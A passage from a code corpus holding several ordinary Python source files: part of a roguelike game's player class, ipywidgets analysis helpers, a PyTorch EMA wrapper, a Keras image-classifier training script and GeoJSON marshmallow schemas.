level=self.level, exp=self.exp)\n\n def heal(self):\n self.hp = self.max_hp\n\n def info(self):\n self.last_happend = '{}. Необходимо {} опыта до нового уровня.\\nНесет с собой {}'.format(self.descr,\n self.next_level_exp - self.exp,\n '\\n'.join(\n str(i) for i in\n set(\n self.equipment.values())\n if i is not None))\n if len(self.magicbook) > 0:\n self.last_happend += '\\nТак же знает следующие заклинания:\\n' + '\\n'.join(str(m) for m in self.magicbook)\n\n def share(self, player_name, item_name):\n try:\n player = next(p for p in self.world.players.values() if p.name == player_name)\n item = next(i for i in self.inventory if i.name == item_name)\n if distance(self.position, player.position) <= self.talking_distance:\n self.inventory.remove(item)\n player.inventory.append(item)\n self.last_happend = '{} передал {} в руки {}'.format(self.name, item_name, player_name)\n else:\n self.last_happend = '{} слишком далеко от {}'.format(self.name, player_name)\n except StopIteration:\n self.last_happend = \"{} не может дать {} в руки {}\".format(self.name, item_name, player_name)\n\n def move_player(self, direction):\n target = DIRS[direction].go(self.position)\n if not self.world.can_move(self, target) and self.world.is_occupied(target):\n self.use_main_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.use_second_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.last_happend = self.name + ' не может походить туда'\n elif not self.world.can_move(self, target):\n self.last_happend = self.name + ' не может походить туда'\n else:\n need_points = self.points_to_go(target)\n if self.ap >= need_points:\n self.move(target, need_points)\n else:\n self.last_happend = self.name + ' не имеет очков хода чтобы походить'\n\n def showshopitems(self):\n nearby_merchant_items = (self.world.mobs[m].show_items() for m in self.world.mobs_near(square(self.position, 2))\n if self.world.mobs[m].kind in traders)\n\n self.last_happend = next(\n nearby_merchant_items, self.name + ' спросил никого о торгах')\n\n def get_trade_offers(self):\n for m in self.world.mobs_near(square(self.position, 2)):\n if self.world.mobs[m].kind in traders:\n return self.world.mobs[m].get_trade_info()\n return None\n\n def trade(self, item_name, merchant_name=\"\"):\n try:\n merchant = next(self.world.mobs[m] for m in self.world.mobs_near(square(self.position, 2)) if\n self.world.mobs[m].kind in traders if merchant_name == \"\" or self.world.mobs[m].name == merchant_name)\n if item_name not in merchant.store:\n self.last_happend = \"у торговца нет \" + item_name\n elif self.money < merchant.store[item_name].price:\n self.last_happend = self.name + ' не имеет достаточно денег на ' + item_name\n else:\n self.last_happend = merchant.sold(self, item_name)\n except StopIteration:\n self.last_happend = self.name + ' попытался поторговаться с никем'\n\n def open_inventory(self):\n # FIXME here, use counter properly pls\n showed_dict = Counter(self.inventory)\n self.last_happend = 'Предметы:\\n'\n self.last_happend += '\\n'.join(\n '{} - {}, {} штук'.format(item.name, item.description, showed_dict[item]) for item in showed_dict)\n self.last_happend += '\\n'\n\n def inventory_for_web(self):\n showed_dict = Counter(self.inventory)\n return [dict(count=cnt, **item.info()) for item, cnt in sorted(showed_dict.items(), key=lambda x: x[0].name)]\n\n def blocked_damage(self, damage):\n return ceil(damage * (1 - (sum(\n a.block for a in self.equipment.values() if a is not None and a.kind == 'armor') / max_armor_value)))\n\n def masking(self):\n return self.obscurity\n\n def on_position_left(self, x, y):\n pos = (int(x), int(y))\n if pos == self.position:\n return\n directions = directions_on(self.position, pos)\n for d in directions:\n self.move_player(d)\n if \"не может походить туда\" not in self.last_happend:\n break\n else:\n self.last_happend = self.name + \" не может походить туда\"\n\n def on_position_right(self, x, y):\n pos = (int(x), int(y))\n if pos == self.position:\n return\n dirs = directions_on(self.position, pos)\n if len(dirs) == 0:\n return\n direction = dirs[0]\n self.use_main_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.use_second_weapon(direction)\n if \"не имеет\" in self.last_happend:\n self.last_happend = self.name + \" не иммеет оружия\"\n\n def equip(self, item_name):\n try:\n weapon = next(i for i in self.inventory if i.name == item_name and i.tag == 'equipable')\n for part in weapon.bodyparts:\n if self.equipment[part] is not None: self.equipment[part].unequip()\n weapon.equip(self)\n self.inventory.remove(weapon)\n self.last_happend = '{} надел {}'.format(self.name, item_name)\n except StopIteration:\n self.last_happend = \"{} не может надеть {}\".format(self.name, item_name)\n\n def unequip(self, item_name):\n try:\n weapon = next(i for i in set(self.equipment.values()) if i is not None and i.name == item_name)\n weapon.unequip()\n self.last_happend = '{} снял {}'.format(self.name, item_name)\n except StopIteration:\n self.last_happend = '{} не имеет {}'.format(self.name, item_name)\n\n def use(self, item_name, *item_args):\n try:\n item = next(i for i in self.inventory if i.name == item_name and i.kind == 'usable')\n self.last_happend = item.use(self, *item_args)\n except StopIteration:\n self.last_happend = self.name + \" не может использовать \" + item_name\n\n def equip_or_use(self, item_name, *item_args):\n try:\n item = next(i for i in self.inventory if i.name == item_name and i.kind == 'usable')\n self.last_happend = item.use(self, *item_args)\n except StopIteration:\n self.equip(item_name)\n\n def remove(self, item_name):\n try:\n item = next(i for i in self.inventory if i.name == item_name)\n item.remove(self)\n self.last_happend = '{} выкинул {}'.format(self.name, item.name)\n except StopIteration:\n self.last_happend = '{} не имеет {}'.format(self.name, item_name)\n\n def nothing(self):\n self.last_happend = '{} пропускает ход'.format(self.name)\n self.ap -= 1\n\n def use_weapon(self, weapon, direction):\n d = DIRS[direction]\n if self.ap >= weapon.cost:\n self.last_happend = self.name + weapon.use(d)\n else:\n self.last_happend = self.name + ' не имеет достаточно очков для ' + weapon.name\n\n def use_main_weapon(self, direction):\n if self.equipment['основное'] is not None and self.equipment['основное'].kind == 'weapon':\n return self.use_weapon(self.equipment['основное'], direction)\n else:\n self.last_happend = self.name + ' не имеет основного оружия'\n\n def use_second_weapon(self, direction):\n if self.equipment['дополнительное'] is not None and self.equipment['дополнительное'].kind == 'weapon':\n return self.use_weapon(self.equipment['дополнительное'], direction)\n else:\n self.last_happend = self.name + ' не имеет запасного оружия'\n\n def magic(self, magic_name):\n try:\n self.last_happend = self.name + next(\n magic for magic in self.magicbook if magic is not None and magic.name == magic_name).use()\n except StopIteration:\n self.last_happend = self.name + ' не имеет ' + magic_name\n\n def drop_on_world(self, item_name):\n try:\n item = next(i for i in self.inventory if i.name == item_name)\n except StopIteration:\n self.last_happend = self.name + ' не имеет ' + item_name\n else:\n try:\n pos = next(p for p in ring(self.position, self.pickup_distance + 1, self.pickup_distance + 1) if\n self.world.can_move(self, p))\n item.remove(self)\n self.world.place_drop(item, pos)\n self.last_happend = self.name + \" выбросил \" + item_name + \" на землю\"\n except StopIteration:\n self.last_happend = self.name + \" не может выбросить предмет потому что вокруг все занято\"\n\n def pick_up_item(self):\n positions = [position for position in self.world.drop\n if manhattan(self.position, position) <= self.pickup_distance]\n\n pick_up_message = ('\\n{} поднял {}'.format(self.name, self.world.items_names(positions))\n if len(positions) > 0 else '')\n for position in positions:\n self.inventory.extend(self.world.drop[position])\n del self.world.drop[position]\n return pick_up_message\n\n def drop_award(self):\n for item in self.inventory:\n self.world.place_drop(item, self.position)\n return \", \".join(i.name for i in self.inventory)\n\n def plot(self):\n start_line = '\\n╔' + '══' * self.window_width + '╗'\n end_line = '\\n╚' + '══' * self.window_width + '╝'\n\n map_plotted = start_line\n for i in range(self.position[0] - self.window_height // 2, self.position[0] + self.window_height // 2 + 1):\n line = ''\n for j in range(self.position[1] - self.window_width // 2, self.position[1] + self.window_width // 2 + 1):\n if abs(distance(self.position, (i, j)) - self.see) <= 1:\n line += '░░'\n elif distance(self.position, (i, j)) > self.see:\n line += '▒▒'\n elif self.world.is_occupied((i, j)):\n line += self.world.mobs[(i, j)].look\n elif self.world.is_drop((i, j)):\n line += self.world.drop[(i, j)][-1].look\n elif self.world.board.is_inside((i, j)):\n line += self.world.board.square((i, j)).look\n else:\n line += '▓▓'\n map_plotted += '\\n║' + line + '║'\n map_plotted += end_line\n return map_plotted\n\n def plot_for_web(self):\n start_line = '╔' + '══' * self.window_width + '╗'\n end_line = '
    ╚' + '══' * self.window_width + '╝'\n descriptions = {}\n\n map_plotted = start_line\n for i in range(self.position[0] - self.window_height // 2, self.position[0] + self.window_height // 2 + 1):\n line = ''\n for j in range(self.position[1] - self.window_width // 2, self.position[1] + self.window_width // 2 + 1):\n if abs(distance(self.position, (i, j)) - self.see) <= 1:\n line += '░░'\n elif distance(self.position, (i, j)) > self.see:\n line += '▒▒'\n elif self.world.is_occupied((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = self.world.mobs[(i, j)].show()\n style = \"\"\n if self.world.board.is_inside((i, j)):\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.mobs[(i, j)].look}\"\n elif self.world.is_drop((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = str(self.world.drop[(i, j)][-1])\n style = \"\"\n if self.world.board.is_inside((i, j)):\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.drop[(i, j)][-1].look}\"\n elif self.world.board.is_inside((i, j)):\n tile_id = f\"tile_{i}_{j}\"\n descriptions[tile_id] = self.world.board.square((i, j)).description\n style = self.world.board.square((i, j)).style\n line += f\"{self.world.board.square((i, j)).look}\"\n else:\n line += '▓▓'\n map_plotted += '
    ║' + line + '║'\n map_plotted += end_line\n return map_plotted, descriptions\n\n def is_player(self):\n return True\n","repo_name":"arovesto/underdanger","sub_path":"src/mobile/npc/player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":16582,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"30110725303","text":"import os\nfrom typing import List, Optional, Dict\nfrom ipywidgets import Label, HBox, VBox, HTML\n\nclass BaseAnalysis():\n def __init__(self):\n self._return_widgets = []\n self.pixel_value_frequencies: Optional[Dict] = None\n \n def _add_result(self, file: str, label: str):\n stats = os.stat(str(file))\n size = stats.st_size\n name_label = Label(label)\n file_label = Label(file)\n size_label = HTML(f\"
    {size}
    \")\n box = HBox(children=[name_label, file_label, size_label])\n \n self._return_widgets.append({\n \"widget\": box,\n \"label\": label,\n \"file\": file,\n \"size\": size,\n \"frequencies\": self.pixel_value_frequencies if self.pixel_value_frequencies is not None else {}\n })\n \n def _add_multi_file_result(self, files: List[str], label: str):\n size = 0\n for file in files:\n size += os.stat(file).st_size\n \n name_label = Label(label)\n list_items = [f'{str(file)}{os.stat(file).st_size}' for file in files]\n file_label = HTML('
    ' + '\\r'.join(list_items) + '
    ')\n box = VBox(children=[name_label, file_label])\n \n self._return_widgets.append({\n \"widget\": box,\n \"name\": name_label,\n \"files\": files,\n \"size\": size,\n \"frequencies\": self.pixel_value_frequencies if self.pixel_value_frequencies is not None else {}\n })\n \n def get_results(self, widgets: List) -> None:\n widgets.extend(self._return_widgets)\n","repo_name":"jheinnic/capsule-6366552","sub_path":"code/v1/base_analysis.py","file_name":"base_analysis.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2084979130","text":"\"\"\"Exponential moving average(EAM) Code.\n\n* Reference: https://www.zijianhu.com/post/pytorch/ema/\n\"\"\"\n\nimport torch\nfrom torch import nn\nfrom copy import deepcopy\nfrom collections import OrderedDict\n\n\nclass EMA(nn.Module):\n \"\"\"EAM.\"\"\"\n\n def __init__(self, model: nn.Module, decay: float, device: torch.device):\n \"\"\"Get a model and decay parameter.\"\"\"\n super().__init__()\n self.decay = decay\n self.model = model\n\n self.shadow = deepcopy(self.model)\n self.shadow.eval()\n self.shadow.to(device)\n for param in self.shadow.parameters():\n param.requires_grad_(False)\n\n @torch.no_grad()\n def update(self):\n \"\"\"Update.\"\"\"\n if not self.training:\n print(\"EMA update should only be called during training\")\n return\n\n model_params = OrderedDict(self.model.named_parameters())\n shadow_params = OrderedDict(self.shadow.named_parameters())\n\n # check if both model contains the same set of keys\n assert model_params.keys() == shadow_params.keys()\n\n for name, param in model_params.items():\n # shadow_variable -= (1 - decay) * (shadow_variable - variable)\n shadow_params[name].sub_(\n (1. - self.decay) * (shadow_params[name] - param)\n )\n\n model_buffers = OrderedDict(self.model.named_buffers())\n shadow_buffers = OrderedDict(self.shadow.named_buffers())\n\n # check if both model contains the same set of keys\n assert model_buffers.keys() == shadow_buffers.keys()\n\n for name, buffer in model_buffers.items():\n # buffers are copied\n shadow_buffers[name].copy_(buffer)\n","repo_name":"tyui592/pytorch_FlexMatch","sub_path":"ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35030918047","text":"# Importing libraries\nfrom keras import applications\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense, Conv2D\nfrom keras.layers import Activation, BatchNormalization, MaxPooling2D\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nfrom keras.models import load_model\n\nnp.random.seed(8)\n\n# Constants and Hyperparameters.\nimg_width, img_height = 128, 128\ntrain_data_dir = 'data/train'\nvalidation_data_dir = 'data/valid'\nnb_train_samples = 1600\nnb_validation_samples = 400\nepochs = 20\nbatch_size = 32\nchanDim = -1\ninput_shape = (img_width, img_height, 3)\nclasses = 4\n\n\n# Convolutional model\n# CONV -> RELU -> POOL\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), padding=\"same\",input_shape=input_shape))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# CONV -> RELU -> POOL \nmodel.add(Conv2D(32, (3, 3), padding=\"same\"))\nmodel.add(Activation(\"relu\"))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n# FC -> RELU \nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation(\"relu\"))\nmodel.add(Dropout(0.5))\n\n# Softmax\nmodel.add(Dense(classes))\nmodel.add(Activation(\"softmax\"))\n\n# Compiling the model with Adam optimizer\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers.Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-15, decay=0.0),metrics=['accuracy'])\n\n# Data Augmentation only used for rescaling planned to use for zoom and flipping for increasing data set\ntrain_datagen = ImageDataGenerator(\n rescale=1. / 255, horizontal_flip=True)\n # ,zoom_range=0.2,\n \n\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size=(128, 128),\n batch_size=batch_size,\n class_mode='categorical')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size=(128, 128),\n batch_size=batch_size,\n class_mode='categorical')\n\n# Fine-tuning the model\nH = model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples//batch_size,\n epochs=epochs,\n verbose = 1,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples//batch_size,\n shuffle = True)\n\n# print(validation_generator.class_indices)\n\n# Saving the model\nmodel.save(str(epochs)+'epochs.h5')\n\nfrom keras import backend as K\nK.clear_session()\n\n# Plotting results\nN = np.arange(0, epochs)\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(N, H.history[\"loss\"], label=\"train_loss\")\nplt.plot(N, H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(N, H.history[\"acc\"], label=\"train_acc\")\nplt.plot(N, H.history[\"val_acc\"], label=\"val_acc\")\nplt.plot()\nplt.title(\"Training, Valid Accuracy & Loss\")\nplt.xlabel(\"#Epoch\")\nplt.ylabel(\"Accuracy & Loss\")\nplt.legend()\nplt.savefig(str(epochs)+'epochs.png')\nplt.show()\n","repo_name":"saiwho/ikea-dataset-classification","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21618626554","text":"from dataclasses import dataclass\nfrom typing import Dict\nfrom typing import List\nfrom typing import Union\n\nimport geojson\nimport shapely.geometry\nfrom marshmallow import Schema\nfrom marshmallow import ValidationError\nfrom marshmallow import fields\nfrom marshmallow import post_load\nfrom marshmallow import validate\n\nfrom geoschema.logger import get_logger\n\nLOGGER = get_logger()\n\n\n@dataclass\nclass GeoJsonGeometry:\n \"\"\"\n Any GeoJSON geometry in 2D coordinates\n\n This is a generic base class or type for all of the GeoJSON geometries.\n To effectively use inheritance with dataclasses, it is easier to use all\n optional attributes that are initialized with None. All the inherited\n classes override these defaults.\n \"\"\"\n\n type: str = None\n coordinates: List[float] = None\n bbox: List[float] = None\n\n @property\n def __geo_interface__(self) -> Dict:\n return self.to_dict()\n\n def to_dict(self) -> Dict:\n return {\"type\": self.type, \"coordinates\": self.coordinates, \"bbox\": self.bbox}\n\n\n@dataclass\nclass GeoJsonPoint(GeoJsonGeometry):\n \"\"\"\n A GeoJSON point in 2D coordinates\n\n The `bbox` for a point is always going to be [x, y, x, y].\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonPoint\n >>> geojson_point = GeoJsonPoint(**{\"type\": \"Point\", \"coordinates\": [-115.81, 37.24]})\n GeoJsonPoint(type='Point', coordinates=[-115.81, 37.24], bbox=None)\n >>> geojson_point.x\n -115.81\n >>> geojson_point.y\n 37.24\n >>> geojson.dumps(geojson_point)\n '{\"type\": \"Point\", \"coordinates\": [-115.81, 37.24], \"bbox\": [-115.81, 37.24, -115.81, 37.24]}'\n >>> geojson_point.shape\n \n\n .. seealso::\n - https://geojson.org/schema/Point.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.2\n \"\"\"\n\n type: str = \"Point\"\n coordinates: List[float] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.Point(self.x, self.y)\n self.bbox = list(self._shape.bounds)\n\n @property\n def x(self):\n return self.coordinates[0]\n\n @property\n def y(self):\n return self.coordinates[1]\n\n @property\n def shape(self) -> shapely.geometry.Point:\n return self._shape\n\n\nclass GeoJsonPointSchema(Schema):\n \"\"\"\n A GeoJSON point schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonPoint\n from geoschema.geojson_schemas import GeoJsonPointSchema\n\n point = geojson.Point((-115.81, 37.24))\n assert isinstance(point, geojson.geometry.Point)\n assert isinstance(point, dict) # it is also a Dict\n geojson_dump = geojson.dumps(point)\n point_schema = GeoJsonPointSchema()\n geojson_point = point_schema.load(point) # load a geojson dict\n assert isinstance(geojson_point, GeoJsonPoint)\n geojson_point = point_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_point, GeoJsonPoint)\n serialized = geojson.dumps(geojson_point)\n\n .. seealso::\n - https://geojson.org/schema/Point.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.2\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"Point\"), required=True)\n coordinates = fields.List(\n fields.Float(), validate=validate.Length(min=2, max=2), required=True\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonPoint:\n return GeoJsonPoint(**data)\n\n\n@dataclass\nclass GeoJsonMultiPoint(GeoJsonGeometry):\n \"\"\"\n A GeoJSON line string in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiPoint\n\n >>> data = {\"coordinates\": [[-155.52, 19.61], [-156.22, 20.74], [-157.97, 21.46]], \"type\": \"MultiPoint\"}\n >>> geojson_points = GeoJsonMultiPoint(**data)\n >>> geojson_points\n GeoJsonMultiPoint(type='MultiPoint', coordinates=[[-155.52, 19.61], [-156.22, 20.74], [-157.97, 21.46]], bbox=[-157.97, 19.61, -155.52, 21.46])\n >>> geojson.dumps(geojson_points)\n '{\"type\": \"MultiPoint\", \"coordinates\": [[-155.52, 19.61], [-156.22, 20.74], [-157.97, 21.46]], \"bbox\": [-157.97, 19.61, -155.52, 21.46]}'\n >>> geojson_points.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiPoint.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.3\n \"\"\"\n\n type: str = \"MultiPoint\"\n coordinates: List[List[float]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.MultiPoint(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiPoint:\n return self._shape\n\n\nclass GeoJsonMultiPointSchema(Schema):\n \"\"\"\n A GeoJSON MultiPoint schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonMultiPoint\n from geoschema.geojson_schemas import GeoJsonMultiPointSchema\n\n multi_point = geojson.MultiPoint(\n [(-155.52, 19.61), (-156.22, 20.74), (-157.97, 21.46)]\n )\n assert isinstance(multi_point, geojson.geometry.MultiPoint)\n assert isinstance(multi_point, dict) # it is also a dict\n schema = GeoJsonMultiPointSchema()\n geojson_points = schema.load(multi_point) # load a geojson dict\n assert isinstance(geojson_points, GeoJsonMultiPoint)\n geojson_dump = geojson.dumps(multi_point)\n geojson_points = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_points, GeoJsonMultiPoint)\n serialized = geojson.dumps(geojson_points)\n\n .. seealso::\n - https://geojson.org/schema/MultiPoint.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.3\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiPoint\"), required=True)\n coordinates = fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiPoint:\n return GeoJsonMultiPoint(**data)\n\n\n@dataclass\nclass GeoJsonLineString(GeoJsonGeometry):\n \"\"\"\n A GeoJSON line string in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonLineString\n\n >>> data = {\"type\": \"LineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]]}\n >>> geojson_line = GeoJsonLineString(**data)\n >>> geojson_line\n GeoJsonLineString(type='LineString', coordinates=[[8.919, 44.4074], [8.923, 44.4075]], bbox=[8.919, 44.4074, 8.923, 44.4075])\n >>> geojson.dumps(geojson_line)\n '{\"type\": \"LineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]], \"bbox\": [8.919, 44.4074, 8.923, 44.4075]}'\n >>> geojson_line.shape\n \n\n .. seealso::\n - https://geojson.org/schema/LineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.4\n \"\"\"\n\n type: str = \"LineString\"\n coordinates: List[List[float]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.LineString(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.LineString:\n return self._shape\n\n\nclass GeoJsonLineStringSchema(Schema):\n \"\"\"\n A GeoJSON line string schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonLineString\n from geoschema.geojson_schemas import GeoJsonLineStringSchema\n\n line_string = geojson.LineString([(8.919, 44.4074), (8.923, 44.4075)])\n assert isinstance(line_string, geojson.geometry.LineString)\n assert isinstance(line_string, dict) # it is also a dict\n geojson_dump = geojson.dumps(line_string)\n schema = GeoJsonLineStringSchema()\n geojson_line = schema.load(line_string) # load a geojson dict\n assert isinstance(geojson_line, GeoJsonLineString)\n geojson_line = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_line, GeoJsonLineString)\n serialized = geojson.dumps(geojson_line)\n\n .. seealso::\n - https://geojson.org/schema/LineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.4\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"LineString\"), required=True)\n coordinates = fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=2),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonLineString:\n return GeoJsonLineString(**data)\n\n\n@dataclass\nclass GeoJsonMultiLineString(GeoJsonGeometry):\n \"\"\"\n A GeoJSON MultiLineString in 2D coordinates\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonMultiLineString\n\n >>> data = {\"type\": \"MultiLineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]]}\n >>> geojson_line = GeoJsonMultiLineString(**data)\n >>> geojson_line\n GeoJsonMultiLineString(type='MultiLineString', coordinates=[[8.919, 44.4074], [8.923, 44.4075]], bbox=[8.919, 44.4074, 8.923, 44.4075])\n >>> geojson.dumps(geojson_line)\n '{\"type\": \"MultiLineString\", \"coordinates\": [[8.919, 44.4074], [8.923, 44.4075]], \"bbox\": [8.919, 44.4074, 8.923, 44.4075]}'\n >>> geojson_line.shape\n \n\n .. seealso::\n - https://geojson.org/schema/MultiLineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.5\n \"\"\"\n\n type: str = \"MultiLineString\"\n coordinates: List[List[List[float]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n self._shape = shapely.geometry.MultiLineString(self.coordinates)\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.MultiLineString:\n return self._shape\n\n\nclass GeoJsonMultiLineStringSchema(Schema):\n \"\"\"\n A MultiLineString composed of a list of line strings in 2D coordinates\n\n .. code-block::\n\n multi_line = geojson.MultiLineString(\n [\n [(3.75, 9.25), (-130.95, 1.52)],\n [(23.15, -34.25), (-1.35, -4.65), (3.45, 77.95)],\n ]\n )\n assert isinstance(multi_line, geojson.geometry.MultiLineString)\n assert isinstance(multi_line, dict) # it is also a dict\n schema = GeoJsonMultiLineStringSchema()\n geojson_lines = schema.load(multi_line) # load a geojson dict\n assert isinstance(geojson_lines, GeoJsonMultiLineString)\n geojson_dump = geojson.dumps(multi_line)\n geojson_lines = schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_lines, GeoJsonMultiLineString)\n serialized = geojson.dumps(geojson_lines)\n\n .. seealso::\n - https://geojson.org/schema/MultiLineString.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.5\n \"\"\"\n\n type = fields.Str(validate=validate.Equal(\"MultiLineString\"), required=True)\n coordinates = fields.List(\n fields.List(\n fields.List(fields.Float(), validate=validate.Length(min=2, max=2)),\n validate=validate.Length(min=2),\n ),\n required=True,\n )\n bbox = fields.List(\n fields.Float(), validate=validate.Length(min=4), load_default=None\n )\n\n @post_load\n def make_obj(self, data, **kwargs) -> GeoJsonMultiLineString:\n return GeoJsonMultiLineString(**data)\n\n\n@dataclass\nclass GeoJsonPolygon(GeoJsonGeometry):\n \"\"\"\n A GeoJSON Polygon in 2D coordinates\n\n - For type \"Polygon\", the \"coordinates\" member MUST be an array of\n linear ring coordinate arrays.\n - For Polygons with more than one of these rings, the first MUST be\n the exterior ring, and any others MUST be interior rings. The\n exterior ring bounds the surface, and the interior rings (if\n present) bound holes within the surface.\n\n .. code-block::\n\n >>> import geojson\n >>> from geoschema.geojson_schemas import GeoJsonPolygon\n\n >>> data = {\"type\": \"Polygon\", \"coordinates\": [[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]]}\n >>> geojson_polygon = GeoJsonPolygon(**data)\n >>> geojson_polygon\n GeoJsonPolygon(type='Polygon', coordinates=[[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]], bbox=[-120.43, -20.28, 23.194, 57.322])\n >>> geojson.dumps(geojson_polygon)\n '{\"type\": \"Polygon\", \"coordinates\": [[[2.38, 57.322], [23.194, -20.28], [-120.43, 19.15], [2.38, 57.322]], [[-5.21, 23.51], [15.21, -10.81], [-20.51, 1.51], [-5.21, 23.51]]], \"bbox\": [-120.43, -20.28, 23.194, 57.322]}'\n >>> geojson_polygon.shape\n \n\n .. seealso::\n - https://geojson.org/schema/Polygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.6\n \"\"\"\n\n type: str = \"Polygon\"\n coordinates: List[List[List[float]]] = None\n bbox: List[float] = None\n\n def __post_init__(self):\n # the first linear ring of the coordinates must be the exterior ring\n # and the rest of them must be one or more interior rings\n self._shape = shapely.geometry.Polygon(\n self.coordinates[0], self.coordinates[1:]\n )\n self.bbox = list(self._shape.bounds)\n\n @property\n def shape(self) -> shapely.geometry.Polygon:\n return self._shape\n\n\nclass GeoJsonPolygonSchema(Schema):\n \"\"\"\n A GeoJSON Polygon schema in 2D coordinates\n\n .. code-block::\n\n import geojson\n from geoschema.geojson_schemas import GeoJsonPolygon\n from geoschema.geojson_schemas import GeoJsonPolygonSchema\n\n # hole within polygon\n polygon = geojson.Polygon(\n [\n [(2.38, 57.322), (23.194, -20.28), (-120.43, 19.15), (2.38, 57.322)],\n [(-5.21, 23.51), (15.21, -10.81), (-20.51, 1.51), (-5.21, 23.51)],\n ]\n )\n assert isinstance(polygon, geojson.geometry.Polygon)\n assert isinstance(polygon, dict) # it is also a dict\n polygon_schema = GeoJsonPolygonSchema()\n geojson_polygon = polygon_schema.load(polygon) # load a geojson dict\n assert isinstance(geojson_polygon, GeoJsonPolygon)\n geojson_dump = geojson.dumps(polygon)\n geojson_polygon = polygon_schema.loads(geojson_dump) # load a geojson string\n assert isinstance(geojson_polygon, GeoJsonPolygon)\n serialized = geojson.dumps(geojson_polygon)\n\n .. seealso::\n - https://geojson.org/schema/Polygon.json\n - https://tools.ietf.org/html/rfc7946#section-3.1.6\n 